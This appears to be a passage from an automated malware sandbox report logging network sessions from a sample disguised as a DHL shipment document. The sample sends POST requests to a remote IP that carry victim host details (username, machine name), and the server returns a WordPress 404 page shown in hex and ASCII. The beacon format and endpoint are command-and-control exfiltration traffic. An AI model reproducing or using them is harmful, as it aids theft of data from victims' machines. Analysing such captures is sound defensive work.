                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:23.510556936 CET173INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:23.510648012 CET174INData Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
                  Mar 21, 2023 07:13:23.510678053 CET176INData Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:23.510725021 CET177INData Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:23.510778904 CET178INData Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:23.510813951 CET180INData Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:23.510844946 CET181INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d
                  Data Ascii: p--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff
                  Mar 21, 2023 07:13:23.510881901 CET182INData Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:23.680857897 CET184INData Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.44969964.227.48.21280C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  TimestampkBytes transferredDirectionData
                  Mar 21, 2023 07:13:23.800014973 CET188OUTPOST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 163
                  Connection: close
                  Mar 21, 2023 07:13:23.967590094 CET189OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.rujones066656DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Mar 21, 2023 07:13:24.722923040 CET190INHTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:23 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:24.722959042 CET191INData Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:24.722980022 CET193INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:24.723011971 CET194INData Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
                  Mar 21, 2023 07:13:24.723036051 CET195INData Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:24.723062038 CET197INData Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:24.723079920 CET198INData Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:24.723099947 CET199INData Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:24.723121881 CET200INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77
                  Data Ascii: <style id='global-styles-inline-css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;-
                  Mar 21, 2023 07:13:24.723145962 CET202INData Raw: 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38
                  Data Ascii: set--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186)
                  Mar 21, 2023 07:13:24.890304089 CET204INData Raw: 74 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 69 64 6e 69 67 68 74 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f
                  Data Ascii: t: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--w


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.44970064.227.48.21280C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  TimestampkBytes transferredDirectionData
                  Mar 21, 2023 07:13:25.127063990 CET208OUTPOST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 163
                  Connection: close
                  Mar 21, 2023 07:13:25.296231985 CET209OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.rujones066656DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Mar 21, 2023 07:13:26.076277018 CET210INHTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:25 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:26.076349974 CET211INData Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:26.076397896 CET213INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:26.076463938 CET214INData Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
